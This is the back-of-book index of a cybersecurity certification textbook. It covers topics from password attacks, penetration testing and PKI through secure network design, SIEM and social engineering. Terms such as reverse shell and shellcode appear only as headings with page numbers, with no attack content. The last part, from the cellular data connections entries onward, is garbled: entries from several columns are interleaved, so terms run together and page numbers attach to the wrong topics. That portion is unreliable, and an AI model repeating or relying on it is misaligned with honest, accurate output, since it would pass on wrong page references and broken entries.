    dictionary attacks, 160
    horizontal brute force online attacks, 159
    hybrid password attacks, 160
    offline password attacks, 159-160
    online password attacks, 159
    password spraying, 159
    plaintext/unencrypted password attacks, 159
    rainbow table attacks, 160
  Password Authentication Protocol (PAP), 157-158
  Password Authenticated Key Exchange (PAKE), 238-239
  password-based account access mechanisms, 154
  Password-Based Key Derivation Function 2 (PBKDF2), 117
  policies, 183-184, 192-193
  spraying, 159
  vault, 162
patch management
  host security solutions, 326-327
  software vulnerabilities, 50-51
  zero-day vulnerability, 51
pathping, network reconnaissance tools, 37
payload classifications
  ransomware, 82
  remote access Trojans (RATs), 82
  rootkits, 82
  spyware, 82
Payment Card Industry Data Security Standard (PCI DSS), 14, 442, 504
PBKDF2 (Password-Based Key Derivation Function 2), 117
PCI DSS. see Payment Card Industry Data Security Standard (PCI DSS)
PEAP (Protected Extensible Authentication Protocol), 242
PEM (Privacy-enhanced Electronic Mail), 140
penetration testing
  attack life cycle, 70
  attack profile
    black box, 68
    gray box, 68
    white box, 68
  bug bounty, 68
  defined, 67
  exercise types, 68-69
  passive and active reconnaissance, 69-70
  rules of engagement, 67-68
percent encoding, 373
performance limitations, cryptographic weaknesses, 113-114
permissions policies, 421
persistence, pen test attack life cycle, 70
persistence malicious code, 395
persistent (closed) cookies, 374
persistent storage acquisition, 493
personal area networks (PANs), 357, 358-359
personal health information (PHI), 441-442
personal identification number (PIN), 150, 154
personally identifiable information (PII), 441
personally owned device use, 209
person-made disasters, 511
personnel policies for privilege management
  job rotation, 182
  least privilege, principle of, 182
  mandatory vacation, 183
  separation of duties, 182
pfSense
  firewall rule configuration, 258
  Internet Key Exchange (IKE), 307
  log parser, 277
  OpenVPN, 303-304
PGP (Pretty Good Privacy), 134, 152
pharming, 79
phishing campaigns, 77-78, 210
physical access controls, 540
physical controls, 9, 10
physical locks, 542
physically secure cabled network, 550
physical port security and MAC filtering
  Dynamic Host Configuration Protocol (DHCP) snooping, 230
  MAC filtering, 230
  MAC limiting, 230
physical security controls
  guidelines for, 556
  host/environment security
    data sanitization tools, 553-554
    Faraday cages, 550
    fire detection and suppression, 551-552
    hot/cold aisles, 551
    HVAC, 550
    protected distribution, 550
    secure areas, 548-549
    secure data destruction, 552-553
  site security
    alarm systems and sensors, 543-544
    barricades and entry/exit points, 541
    cable locks, 543
    fencing, 541
    gateways and locks, 542-543
    industrial camouflage, 541
    lighting, 541
    mantraps, 543
    physical access controls, 540
    physical attacks of smart cards and USB, 543
    reception personnel and ID badges, 546
    security guards and cameras, 544-545
    site layout, 540-541
piggybacking, 76
PIN (personal identification number), 150, 154
PIN (places in the network), 216, 239
pinch point failures, 216
Ping of Death, 248
pinning, digital certificates, 140
pivoting, pen test attack life cycle, 70
PKCS (Public Key Cryptography Standards), 129
PKCS #12 format, 141
PKI. see public key infrastructure (PKI)
places in the network (PIN)
  SAFE architecture, 216
  Wi-Fi protected setup (WPS), 239
plaintext, 96, 159
platform as a service (PaaS), 409, 410
playbook, 459, 479
Play Protect, 347
plenum, 551
pluggable authentication module (PAM), 155
plug-ins, 59
PNAC. see port-based NAC (PNAC)
point-to-multipoint (P2M), 362
point-to-point (P2P), 361-362
point-to-point protocol (PPP), 304
point-to-point tunneling protocol (PPTP), 303
policy server, 449
polymorphic viruses, 83
POP3S (Post Office Protocol v3), 297
POP3S (Secure POP), 297
port-based NAC (PNAC)
  IEEE 802.1x port-based NAC, 166
  network access control (NAC), 231-232
port filtering/security, 256
port scan
  Nmap Security Scanner, 38
  scanless, 41
positive air pressure, 550
POST (forms mechanism), 292
post-incident activities phase, 457
Post Office Protocol v3 (POP3S), 297
post-quantum cryptographic technology, 120-121
posture assessment, 231
potentially unwanted programs (PUPs), 82, 83
power redundancy
  battery backups, 517
  dual power supplies, 517
  generators, 518
  managed power distribution units (PDUs), 517
  uninterruptible power supplies (UPSs), 517
PowerShell
  abnormal process behavior analysis, 91
  malicious indicators, 395
  penetration testing, 70
  script environment
    cmdlets, 392-393
    functions, 392-393
    logic statements, 393
    looping statements, 393
    modules, 393
PPP (Point-to-Point Protocol), 304
PPTP (Point-to-Point Tunneling Protocol), 303
pre-action fire suppression, 552
predictability, cryptographic weaknesses, 115
predictive analysis, threat intelligence sources, 31
prepending, 78-79
preservation and integrity of evidence, 494
pre-shared key authentication, 307
pretexting, 75-76
Pretty Good Privacy (PGP), 134, 152
preventative control, 9, 10
principle of consensus (social proof), 75
Privacy, Authentication, Integrity, Non-Repudiation (PAIN), 2
privacy and data protection controls. see data privacy and protection controls
privacy and data sensitivity concepts. see data privacy and sensitivity concepts
privacy breaches, 443-444
privacy-enhanced electronic mail (PEM), 140
privacy enhancing technologies, 451
privacy notices, 442
Privacy Shield, 443
privacy terms of agreement, 444-445
private cloud, 408
private keys
  asymmetric encryption, 100-101
  authentication and non-repudiation, 111-112
  confidentiality of, 112-113
  digital certificates, 106
  digital envelopes and key exchange, 106-107
  digital signatures, 104-105
  man-in-the-middle attack (MitM), 116
  perfect forward secrecy, 107-108
  public key cryptography algorithms, 101
  security of, 164
  symmetric encryption, 99
  unchangeable asymmetric private key, 318
  usage of, 126
private network (intranet) zones, 220
private/personal data, 441
private subnets, 423
privilege access management, 187
privileged access management (PAM), 202
privilege escalation
  arbitrary code execution, 366
  error handling, 367
  horizontal privilege escalation, 366
  improper input handling, 367
  pen test attack life cycle, 70
  remote code execution, 366
  vertical privilege escalation, 366
privilege management, personnel policies, 182-183
PRNG. see pseudo RNG (PRNG)
process analysis, malware indicators, 90-91
process automation systems, 334-335
production, development environments, 400
programmatic access, 420
proprietary firewalls, 266
proprietary information, 440-441
protected access credential (PAC), 243
protected distribution system (PDS), 550
protected extensible authentication protocol (PEAP), 242
protocol analysis, organizational security, 42-43
protocol analyzer output, 472-473
Protocol ID/type, 256
protocol smuggling, 381
protocols/ports, restricting, 22
provisioning control, 401
proximity alarm, 544
proximity reader, 542
proxy servers and gateways
  forward proxy servers, 261-262
  reverse proxy servers, 262
pseudo-anonymization process, 451
pseudo RNG (PRNG), 114-115
public (multi-tenant) cloud, 408
public (unclassified) data, 440
publicity, incident response plan (IRP), 459
public key cryptography algorithms
  cryptographic concepts, 101-102
  digital envelopes, 105-106
  usage of, 126
Public Key Cryptography Standards (PKCS), 129
public key infrastructure (PKI)
  digital certificates, 106
  guidelines for, 145
  hierarchical (Intermediate CA), 127-128
  identity management control, 180
  online vs offline CAs, 128
  single CA, 127
  smart-card authentication, 164
  trust model, 127
  usage of, 126
public keys
  asymmetric encryption, 100-101
  authentication and non-repudiation, 111-112, 312
  confidentiality of, 112-113
  digital certificates, 106, 130
  digital envelopes and key exchange, 105-106
  digital signatures, 104-105
  elliptic curve cryptography (ECC), 102
  man-in-the-middle attack (MitM), 116-117
  signature algorithm, 108
  symmetric encryption, 99
public notification and disclosure of data breaches, 444
public subnets, 423
public zone signing key, 287
pulverizing, 552
Puppet cloud orchestration platform, 430
PUPs (potentially unwanted programs), 82, 83
purple team, penetration testing, 69
purpose limitation (personal data), 442
push notifications, 361
Python malicious indicators, 396
Python script environment
  branching statements, 392
  control block, 391-392
  execution of, 392
  logic and looping statements, 391-392
  modules, 392
  variables, 391

Q

qualitative risk assessment, 503-504
quality assurance (QA), 400
quality of service (QoS), 252
quantitative risk assessment
  annualized rate of occurrence (ARO), 503
  annual loss expectancy (ALE), 503
  exposure factor (EF), 502
  single loss expectancy (SLE), 502
quantum cryptographic technology, 120-121
quarantine, 450, 479
QuarkMatter, 88
query (read-only access), 288
qubits, 120

R

race conditions, time of check to time of use (TOCTTOU), 368
radio firmware, 361
radio frequency ID (RFID)
  alarms, 544
  connection method, 359
RADIUS. see remote authentication dial-in user service (RADIUS)
RADIUS Federation, 243
rail fence cipher, 98
rainbow table attacks, 160
Random Access Memory (RAM), 491
ransomware
  malware classifications, 88-89
  payload classifications, 82
RAs (registration authorities), 128-129
Raspberry Pi, 332
RAT. see remote access trojans (RATs)
RAT (remote access tool/Trojan), 70
RBAC (role-based access control), 199
RDP (Remote Desktop Protocol), 310
read-only access (query), 288
read/write access (update), 288
really simple syndication (RSS), 295
real-time operating system (RTOS), 332, 361
real-time transport protocol (RTP), 298-299
reception personnel, 546
reconnaissance, 381, 460
Recorded Future, 27
recovery agent user, 134
recovery point objective (RPO), 509-510, 523
recovery time, incident response plan (IRP), 459
recovery time objective (RTO), 509
red team, penetration testing, 68-69
redundancy strategies
  asynchronous and synchronous replication, 520
  disk redundancy, 519
  fault tolerance and redundancy, 517
  geographical dispersal, 520
  geographical redundancy, 520
  geographical replication, 520
  high availability, 516-517
  maximum tolerable downtime (MTD), 516
  network redundancy, 518
  power redundancy, 517-518
  scalability and elasticity, 516-517
Redundant Array of Independent Disks (RAID)
  disk redundancy, 519
  geographical redundancy, 520
refactoring, 369
regex (regular expression) syntax, 279
regional replication, 422
registration authorities (RAs), 128-129
registry setting, 326
regular expression (regex) syntax, 279
regulations
  Computer Security Act (1987), 13
  General Data Protection Regulation (GDPR), 13-14, 442, 443
  Health Insurance Portability and Accountability Act (HIPAA), 14, 444, 504
  Payment Card Industry Data Security Standard (PCI DSS), 14, 442, 504
  Sarbanes-Oxley Act (SOX), 13, 504
remote access Trojans (RATs)
  as attack vectors, 23
  data exfiltration, 448
  malware classifications, 86-87
  organizational security, 45
  payload classifications, 82
  penetration testing, 70
remote authentication dial-in user service (RADIUS)
  Challenge Handshake Authentication Protocol (CHAP), 166-167
  Extensible Authentication Protocol (EAP), 166-167
  Password Authentication Protocol (PAP), 166-167
  Secure Shell (SSH), 312
remote code execution, 366
Remote Desktop Protocol (RDP), 310
remote desktop protocol (RDP), 412-413
remote hosts, connectivity, route and traceroute, 37
remotely triggered blackhole (RTBH), 249
remote sign-in, Windows authentication, 154
remote wipe, 349-350
removable media attack vector, 22-23
replay attacks, 374-375
replication, data, 422-423
Representational State Transfer (REST), 430
reputational threat intelligence, 26
reputation damage, 443
Request for Comments (RFC), 28
residual risk, 505
resource exhaustion, 368-369
resource policies, 421
response headers
  Cache-Control, 385
  Content Security Policy (CSP), 385
  HTTP Strict Transport Security (HSTS), 385
restoration order, 527-528
retention policy, 463, 466
retinal scan, 174
retrospective network analysis (RNA), 472
reverse proxy CASBs, 427
reverse proxy servers, 262
reverse shell, 396
revocation lists, certificate, 138-139
RFC (Request for Comments), 28
rich communication services (RCS), 360-361
rights management services, 450
RIP (Routing Information Protocol), 219
risk acceptance, 505
Risk and Control Assessment (RCA), 501
Risk and Control Self-Assessment (RSCA), 501
risk appetite, 505
Risk Assessment Method (CIS-RAM), 12
risk assessments (RA), 501
risk avoidance, 504
risk awareness, 505-506
risk deterrence/reduction, 504
risk management
  control risk, 505
  degree of risk
    impact of risk, 500-501
    likelihood of threat, 500
  guidelines for, 514
  heat map risk matrix, 506
  inherent risk, 504
  processes, 500-501
  qualitative risk assessment, 503-504
  quantitative risk assessment, 502-503
  residual risk, 505
  risk acceptance, 505
  Risk and Control Assessment (RCA), 501
  Risk and Control Self-Assessment (RSCA), 501
  risk appetite, 505
  risk assessments (RA), 501
  risk avoidance, 504
  risk awareness, 505-506
  risk register, 506
  risk transference, 505
  risk types, 501-502
  security assessment, 18
  strategies, 504
  see also business impact analysis (BIA)
Risk Management Framework (RMF)
  defined, 11
  enterprise risk management (ERM), 501
risk mitigation/remediation, 504
risk register, 506
risk response, 500
risk transference, 505
risk types
  external, 501
  intellectual property (IP) theft, 501-502
  internal, 501
  legacy systems, 502
  multiparty, 501
  software compliance and licensing, 502
RMF. see risk management framework (RMF)
rogue access points, 243-244
role-based access control (RBAC), 199
root accounts, 184-185
root certificates
  digital certificates, 135
  key recovery, 138
  OpenSSL, 141-142
  public key infrastructure (PKI), 127-128
  update or revoke, 478
rooting, 353-354
rootkits, 82, 87-88
route, network reconnaissance tools, 37
routed appliance firewall, 259
route injections (spoofed routing information) vulnerabilities, 233
router firewall, 260
routers
  network appliances, 217-218
  network log files, 469
RouterSploit, exploitation frameworks, 46
route security
  software exploits, 233
  source routing vulnerabilities, 233
  spoofed routing information (route injections) vulnerabilities, 233
routing and switching protocols
  Address Resolution Protocol (ARP), 218-219
  Border Gateway Protocol (BGP), 219
  Enhanced Interior Gateway Routing Protocol (EIGRP), 219
  Internet Protocol (IP), 219
  layer 2 forwarding, 218
  layer 3 forwarding, 218
  network redundancy, 518
  Open Shortest Path First (OSPF), 219
  Routing Information Protocol (RIP), 219
routing configuration, route and traceroute, 37-38
Routing Information Protocol (RIP), 219
RSA algorithm encryption, 101, 104-105
RSS (Really Simple Syndication), 295
rsyslog, 468
RTBH (remotely triggered blackhole), 249
RTP (Real-Time Transport Protocol), 298-299
rule-based access control
  conditional access, 201-202
  privileged access management (PAM), 202
rules of engagement, penetration tests, 67-68
runbook, 459, 479

S

SA (Security Associations), 307
sabotage, insider threats, 22
SAE (Simultaneous Authentication of Equals), 238
Safari, 470
safes, secure areas, 549
Salesforce, 409
salt, 115, 160
salting
  cryptographic attacks, 117
  database deidentification methods, 452
SAM (Security Accounts Manager), 154
SameSite attributes, 384
SAML (Security Assertion Markup Language), 204-205
Samsung
  KNOX, 346
Samsung Pay, 360
SAN (subject alternative name), 130-131
sandboxing, 329, 401
Sarbanes-Oxley Act (SOX), 13, 504
SASL (Simple Authentication and Security Layer), 288
SATA, 554
SAWs (secure admin workstations), 310
scalability and elasticity, 516-517
scan intrusiveness, 60
scanless, network reconnaissance tools, 41
SCAP. see Security Content Automation Protocol (SCAP)
scheduling load balancers, 250
scope, incident response plan (IRP), 459
screened hosts, 223
screened subnet, 222
screen lock, 349
scripting, 390
script kiddies, defined, 20
script virus, 83
SEAndroid, 347
secret ciphers, 98
secret key, 99, 420
secrets management, 419-420
Sectigo/Comodo, 127
sector-specific (vertical) legislation, 13-14
secure access service edge (SASE), 427
secure admin workstations (SAWs), 310
secure application concepts
  application attack, indicators
    DLL injection, 369
    driver manipulation, 369
    memory leak, 368-369
    null pointer dereference, 368
    overflow vulnerabilities, 367-368
    pass the hash (PtH) attack, 369-370
    privilege escalation, 366-367
    race conditions, 368
    resource exhaustion, 368-369
  deployment and automation concepts
    application development, deployment, and automation, 399
    automation/scripting release paradigms, 401-403
    provisioning control, 401
    secure application development environments, 399-401
    software diversity, 403
    version control, 401
  guidelines for, 405
  secure coding practices
    compiled code, 387
    data exposure, 385
    dead code, 386
    dynamic code analysis, 387-388
    memory management, 385
    obfuscation/camouflage code, 386-387
    secure code usage, 386
    secure coding techniques, 383-384
    server-side vs. client-side validation, 384
    static code analysis, 387
    unreachable code, 386
    web application security, 384-385
  secure script environments
    execution control, 393-394
    malicious code indicators, 394-396
    PowerShell script environment, 392-393
    Python script environment, 390-392
    scripting, 390
  web application attacks
    application programming interfaces (APIs) attacks, 374
    canonicalization attack, 379
    command injection attack, 379
    cross-site scripting (XSS) attacks, 376-377
    directory traversal injection attack, 379
    extensible markup language (XML) injection, 378
    Lightweight Directory Access Protocol (LDAP) injection, 379
    replay attacks, 374-375
    server-side request forgery (SSRF), 380-389
    session hijacking, 375-376
    structured query language (SQL) injection attacks, 377-378
    uniform resource locator (URL) analysis, 372-373
    XML External Entity attack, 378
secure application development environments
  development environments, 400-401
  quality assurance (QA), 400
  software development life cycle (SDLC), 399-400
secure application protocols
  API considerations, 294-295
  email services, 296-298, 297
  file transfer services, 295-296
  hypertext transfer protocol secure (HTTPS), 292
  subscription services, 295
  Transport Layer Security (TLS), 292-294
  voice and video services, 298-299
secure areas
  air-gapped host, 549
  colocation cages, 548-549
  demilitarized zone (DMZ), 549
  safes, 549
  vaults, 549
secure boot, 319
secure cloud solutions
  cloud compute security, 420-421
  cloud deployment models
    community cloud, 408-409
    hosted private cloud, 408
    private cloud, 408
    public (multi-tenant) cloud, 408
  cloud security controls
    cloud access security brokers (CASB), 426-427
    cloud firewall security, 425
    cloud networking security, 423
    cloud storage security, 421-422
    data replication, 422-423
    high availability (HA), 422-423
    identity and access management (IAM), 419-420
    secure web gateway (SWG), 427
    security groups, 425-426
    VPCs and transit gateways, 424
  cloud security integration and auditing, 418-419
  cloud service models
    anything as a service (XaaS), 409-410
    consultants, 411
    infrastructure as a service (IaaS), 409, 410
    Managed Security Services Provider (MSSP), 411
    platform as a service (PaaS), 409, 410
    Security as a Service (SECaaS), 411
    software as a service (SaaS), 409
  guidelines for, 435
  Infrastructure as Code concepts
    application programming interfaces (APIs), 430
    edge computing, 432-433
    fog computing, 432-433
    infrastructure as code (IaC), 431
    serverless architecture, 430-431
    service integration, 429-430
    software-defined networking (SDN), 431-432
    software-defined visibility (SDV), 432
  virtualization technologies
    application virtualization, 413-414
    components of, 411-412
    container virtualization, 413-414
    thin clients, 412-413
    virtual desktop environment (VDE), 413
    virtual desktop infrastructure (VDI), 412-413
    VM escaping protection, 414-415
    VM sprawl avoidance, 415-416
secure code usage, 386
secure coding practices
  compiled code, 387
  data exposure, 385
  dead code, 386
  dynamic code analysis, 387-388
  memory management, 385
  obfuscation/camouflage code, 386-387
  secure code usage, 386
  secure coding techniques, 383-384
  server-side vs. client-side validation, 384
  static code analysis, 387
  unreachable code, 386
  web application security, 384-385
secure coding techniques
  input validation, 383
  normalization, string inputs, 383
  outputting encoding, 383-384
secure configuration baseline, 401
secure configuration guides
  application servers, 13
  network appliance platform, 12-13
  operating systems (OS), 12-13
  vendor-specific guides, 12-13
  web server applications, 13
Security Content Automation Protocol (SCAP), 59
secure cookies
  HttpOnly attributes, 384
  SameSite attributes, 384
secure data destruction, 552-553
secure directory service, 288-289
Secure Erase (SE), 554
secure firmware, implementing
  boot integrity, 319-320
  disk encryption, 320-321
  end of life (EOL), 322-323
  end of service life (EOSL), 322-323
  hardware root of trust (RoT), 318-319
  organizational security agreements, 323
  third-party risk management, 322
  USB and flash drive security, 321-322
secure hash algorithm (SHA), 97-98
secure IMAP (IMAPS), 297
secure mobile device connections
  ad hoc network, 357
  bluetooth connection methods, 358-359
  cellular data connections, 356-357
  firmware over the air updates, 361
  global positioning system (GPS), 357
  guidelines for implementing, 364
  infrared and RFID connection methods, 359
  microwave radio connection methods, 361-362
  multimedia message service (MMS), 360
  near field communications and mobile payment services, 359-360
  personal area networks (PANs), 357
  push notifications, 361
  rich communication services (RCS), 360-361
  short message service (SMS), 360
  USB connection methods, 360
  Wi-Fi and tethering connection methods, 357
  Wi-Fi direct, 357
Secure/Multipurpose Internet Mail Extensions (S/MIME), 134, 297-298
secure network designs
  eavesdropping, 227
  guidelines for implementing, 254
  load balancers
    amplification attack, 247-248
    application attacks, 247-248
    clustering, 250-251
    distributed denial of service (DDoS), 247, 248-249
    DNS amplification attack, 248
    layer 4 load balancer, 249
    layer 7 load balancer, 249
    Network Time Protocol (NTP), 247-248
    operational technology (OT) attacks, 248
    persistence, 250
    quality of service (QoS), 252
    scheduling, 250
    source IP affinity, 250
  network architecture
    business workflows, 217
    east-west traffic considerations, 224
    IPv6, 224
    network appliances, 217-218
    network segmentation, 219-220
    network segregation, 220
    network topology and zones, 220-224
    routing and switching protocols, 218-219
    weakness of, 216
    zero trust, 224-225
  network mapping, 227
  secure switching and routing
    ARP poisoning attacks, 228
    loop prevention, 229-230
    MAC cloning, 227
    MAC flooding, 228-229
    man-in-the-middle attack (MitM), 227
    network access control, 231-232
    on-path attack, 227
    physical port security and MAC filtering, 230-231
    route security, 232-233
  secure wireless infrastructure
    controller and access point security, 236-237
    disassociation and replay attacks, 244-245
    EAP-Tunneled TLS (EAP-TTLS), 242-243
    enterprise/IEEE 802.1X authentication, 240-241
    extensible authentication protocol (EAP), 241-242
    jamming attacks, 245
    open authentication and captive portals, 239-240
    Protected Extensible Authentication Protocol (PEAP), 242
    RADIUS Federation, 243
    rogue access points and evil twins, 243-244
    secure wireless infrastructure, 243
    Wi-Fi authentication methods, 238-239
    Wi-Fi protected access (WPA), 237-238
    Wi-Fi protected setup (WPS), 239
    wireless network installation considerations, 235-236
secure network protocols
  DNS poisoning, 286-287
  DNS security, 287-288
  domain name resolution, 285-286
  guidelines for implementing, 315
  network address allocation, 284-285
  secure application protocols
    API considerations, 294-295
    email services, 296-297
    file transfer services, 295-296
    hypertext transfer protocol secure (HTTPS), 292
    Secure/Multipurpose Internet Mail Extensions (S/MIME), 297-298
    subscription services, 295
    Transport Layer Security (TLS), 292-294
    voice and video services, 298-299
  secure directory service, 288-289
  secure remote access protocols
    Internet Key Exchange (IKE), 307-308
    Internet Protocol Security (IPSec), 304-309
    jump servers, 310-311
    out-of-band (OOB) management, 310
    remote access architecture, 301-302
    Remote Desktop Protocol (RDP), 310
    Secure Shell (SSH), 311-313
    SSL VPN, 303-304
    Transport Layer Security (TLS) VPN, 303-304
    Virtual Network Computing (VNC), 310
    VPN client configuration, 308-309
  Simple Network Management Protocol (SNMP), 289-290
  time synchronization, 289
Secure POP (POP3S), 297
secure remote access protocols
  Internet Key Exchange (IKE), 307-308
  Internet Protocol Security (IPSec), 304-309
  jump servers, 310-311
  out-of-band (OOB) management, 310
  remote access architecture, 301-302
  Remote Desktop Protocol (RDP), 310
  Secure Shell (SSH), 311-313
  SSL VPN, 303-304
  Transport Layer Security (TLS) VPN, 303-304
  Virtual Network Computing (VNC), 310
  VPN client configuration, 308-309
secure script environments
  execution control, 393-394
  malicious code indicators
    Bourne Again Shell (Bash) malicious indicators, 396
    macros, 396-397
    man-in-the-browser (MitB) attack, 397
    PowerShell malicious indicators, 395
    Python malicious indicators, 396
    secure application concepts, 394-396
    Visual Basic for Applications (VBA), 396-397
  PowerShell script environment, 392-393
  Python script environment, 390-392
  scripting, 390
Secure Shell (SSH), 70, 311-313
Secure Sockets Layer (SSL), 292, 376
Secure Sockets Tunneling Protocol (SSTP), 304
secure switching and routing
  ARP poisoning attacks, 228
  loop prevention, 229-230
  MAC cloning, 227
  MAC flooding, 228-229
  man-in-the-middle attack (MitM), 227
  network access control, 231-232
  on-path attack, 227
  physical port security and MAC filtering, 230-231
  route security, 232-233
secure transmission of credentials, onboarding policies, 181
secure real-time transport protocol (SRTP), 299
secure web gateway (SWG), 272, 427
secure wireless infrastructure
  controller and access point security, 236-237
  disassociation and replay attacks, 244-245
  EAP-Tunneled TLS (EAP-TTLS), 242-243
  EAP with Flexible Authentication via Secure Tunneling (EAP-FAST), 243
  enterprise/IEEE 802.1X authentication, 240-241
  extensible authentication protocol (EAP), 241-242
  jamming attacks, 245
  open authentication and captive portals, 239-240
  Protected Extensible Authentication Protocol (PEAP), 242
  RADIUS Federation, 243
  rogue access points and evil twins, 243-244
  Wi-Fi authentication methods, 238-239
  Wi-Fi protected access (WPA), 237-238
  Wi-Fi protected setup (WPS), 239
  wireless network installation considerations, 235-236
secure zones, 540-541
SecurID, 168
Security Accounts Manager (SAM), 154
security account types
  guest accounts, 183-184
  standard users, 183
Security as a Service (SECaaS), 411
Security Assertion Markup Language (SAML), 204-205
security assessments
  automated vulnerability scanning, 57-63
  common vulnerabilities and exposures (CVE)
    Common Vulnerability Scoring System (CVSS), 59-60
    Security Content Automation Protocol (SCAP), 59
    vulnerability feed, 59
  guidelines for, 72
  organizational security
    exploitation frameworks, 45-46
    Netcat, 46-47
    network reconnaissance tools, 36-42
    packet analysis, 43-44
    packet capture, 42
    packet injection and replay, 44-45
    protocol analysis, 42-43
    tcpdump, 42-43
    traffic analysis, 43-44
  penetration testing
    defined, 67
    exercise types, 68-69
    passive and active reconnaissance, 69-70
    pen test attack life cycle, 70
    rules of engagement, 67-68
  penetration tests, 57
  risk management, 18
  threat assessments, 18
  threat hunting, 57
  vulnerability assessments, 18, 57
  vulnerability scanning techniques
    application and web application scanners, 59
    configuration review, 63
    credentialed vs. non-credentialed scanning, 61
    false positives, false negatives, log reviews, 61-62
    intrusive vs. non-intrusive, 60
    network vulnerability scanner, 58
    threat hunting, 64-65
  vulnerability types
    impact of, 53-54
    kernel vulnerabilities, 50-51
    legacy platform vulnerabilities, 51
    patch management, 50-51
    software vulnerabilities, 50-51
    third-party risks, 54-55
    weak host configurations, 51-52
    weak network configurations, 52-53
    zero-day vulnerability, 51
Security Associations (SA), 307
security content automation protocol (SCAP), 63
security controls
  compensating controls, 10
  deterrent controls, 10
  functional types
    corrective control, 9, 10
    detective control, 9, 10
    preventative control, 9, 10
  guidelines for, 18
  managerial security control, 8-10, 9
  operational security control, 8-10, 9
  physical controls, 9, 10
  technical security controls, 8-10, 9
Security-Enhanced Linux, 347
security group-based privileges, 184
security groups, 425-426
security guards, 544-545
security guidance, 11
security identifier (SID), 191
security information and event management (SIEM)
  analysis and report review, 277-278
  correlation rules, 466
  cyber threat intelligence (CTI), 26
  dashboard, 466-467
  file manipulation, 278-279
  grep command, 279
  intelligence fusion, 64-65
  log aggregation, 277
  log collection, 276-277
  logging platforms, 468-469
  monitoring services, 275
  regular expression (regex) syntax, 279
  retention policy, 466
  sensitivity and alerts, 467
  sensors, 467
  threat data feeds, 26
  trend analysis, 468
security limitations, cryptographic weaknesses
  entropy and weak keys, 114-115
  predictability and reuse, 115
security locks, 533
security monitoring data
  data privacy and sensitivity concepts, 438
  mobile device management (MDM)
    application management, 352-353
    carrier unlocking, 353-354
    content management, 353
    enterprise mobility management (EMM), 345
    external media, 350
    full device encryption, 350
    jailbreaking, 353-354
    location services, 350-352
    mobile access control systems, 348-349
    mobile application management (MAM), 345
    mobile device deployment models, 344
    remote wipe/kill switch, 349-350
    rooting, 353-354
    secure mobile device connections
      bluetooth connection methods, 358-359
cellular data connections, segmentation-based SHA (secure hash algorithm),


356-357 containment, 476 97-98
firmware over the air self-encrypting drives (SED), shared accounts, 186-187
updates, 361 321, 554 shared authority, 182
global positioning system self-signed certificates, 135 shellcode, 85, 394
(GPS), 357 sensitive data, 441 shielding signals, 550
infrared and RFID sensitivity and alerts, 467 Shikata Ga Nai, 403
connection methods, 359 sensors, 335, 467 shim, 369
microwave radio sensors, site security, 543-544 short message service (SMS),
connection methods, sentiment analysis, 278 170, 360
361-362 separation of duties, 182 short term retention, 522
multimedia message serial attached SCSI (SAS), shoulder surfing, 77
service (MMS), 360 527, 554 shredding/pulping, 552
near field Server Authentication, 132 SID (security identifier), 191
communications and server-based errors (500 range), sideloading, 353
mobile payment services, 470 SIEM. see security information
359-360 server certificate and event management (SIEM)
push notifications, 361 domain validation (DV), Signal, 458
rich communication 132-133 signature algorithm, 108, 130
services (RCS), 360-361 extended validation (EV), 133 signature-based detection,
short message service serverless architecture, 430-431 270-271
(SMS), 360 server-side attacks, 377-378 signature recognition, 175
USB connection methods, server-side request forgery SiLK suite, 473
360 (SSRF), 380-389 SIM. see subscriber identity
Wi-Fi and tethering server-side vs. client-side module (SIM)
connection methods, validation, 384 Simple Authentication and
357-358 service discovery, Nmap Security Security Layer (SASL), 288
Security Onion, SIEM Scanner, 39-40 simple bind, 288
dashboard, 467 service integration, 429-430 simple message service (SMS),
security operations center (SOC), service level agreement (SLA), SMiShing, 78
5, 457 323, 418, 445 Simple Network Management
security orchestration, service models Protocol (SNMP), 38, 275, 289-290
automation, and response local service accounts, 185 Simple Object Access Protocol
(SOAR) network service accounts, 186 (SOAP), 204-205
automation courses of system accounts, 185 simulations, 462
action, 402-403 service organization control Simultaneous Authentication of
IR mitigation controls, 479 (SOC2), 11-12 Equals (SAE), 238
network security service organization control single CA, 127
appliances, 278 (SOC3), 12 single loss expectancy (SLE), 502
security policy service-oriented architecture single pass zero filling, 553
defined, 4 (SOA) for clouds, 429 single points of failure (SPoF),
shared authority, 182 service set identifier (SSID), 235 510-511
standard operating session hijacking single sign-on (SSO), 155
procedures (SOPs), 182 clickjacking, 376 sinkhole routing, 249
security roles cross-site request forgery SIP (Session Initiation Protocol),
CIA Triad, 2 (XSRF)/(CSRF), 375-376 298-299
competencies, 3-4 Secure Sockets Layer (SSL) site layout, 540-541
guidelines for, 18 strip attack, 376 site resiliency, 532-533
information security, PAIN, 2 Session Initiation Protocol (SIP), site risk assessment, 511
Security Technical 298-299, 471 site security
Implementations Guides sFlow, 473 alarm systems and sensors,
(STIGs), 12 SFTP (SSH FTP), 296 543-544


barricades and entry/exit SOAR. see security orchestration, software development kit
points, 541 automation, and response (SDK), 386
cable locks, 543 (SOAR) software development life cycle
fencing, 541 SOC. see security operations (SDLC)
gateways and locks, 542-543 center (SOC) agile development, 400
industrial camouflage, 541 SOC2. see service organization waterfall model, 400
lighting, 541 control (SOC2) software diversity, 403
mantraps, 543 SOC3. see service organization software exploits, 233
physical access controls, 540 control (SOC3) Software Restriction Policies
physical attacks of smart social engineering techniques (SRP), 394
cards and USB, 543 active reconnaissance, 69 software vulnerabilities, 19, 50-51
reception personnel and ID credential databases, 77 solid state drives (SSD)
badges, 546 credential harvesting, 82 Instant Secure Erase (ISE), 554
security guards and cameras, defined, 74 nonvolatile storage media, 493
544-545 dumpster diving, 76 Secure Erase (SE), 554
site layout, 540-541 guidelines for, 93 secure firmware,
site survey, 236 hoaxes, 78-79 implementing, 320
site-to-site model, 302 identity fraud, 77 Something You Are
skimming, card attacks, 543 impersonation and trust, Authentication, 151
SkyHigh Networks, 426 75-76 Something You Can Do
Sleuth Kit, 491 influence campaigns, 82 Authentication, 152
Small Computer System invoice scams, 77 Something You Do
Interface (SCSI), 520 lunchtime attacks, 77 Authentication, 151
smart buildings, 336 pharming, 79 Something You Exhibit
smart card attacks, 543 phishing, 77-78 Authentication, 152
smart-card authentication, 164 piggy backing, 76 Something You Have
smart cards, 164 prepending, 78-79 Authentication, 150-151
smart devices, 335 pretexting, 75-76 Something You Know
smart meter, 336 principles of, 74-75 Authentication, 150, 152
smartphone authentication, shoulder surfing, 77 Somewhere You Are
348-349 SMiShing, 78 Authentication, 152
S/MIME (Secure/Multipurpose spam, 78-79 sophistication level, of threat
Internet Mail Extensions), 297-298 spear phishing, 78 actors, 19
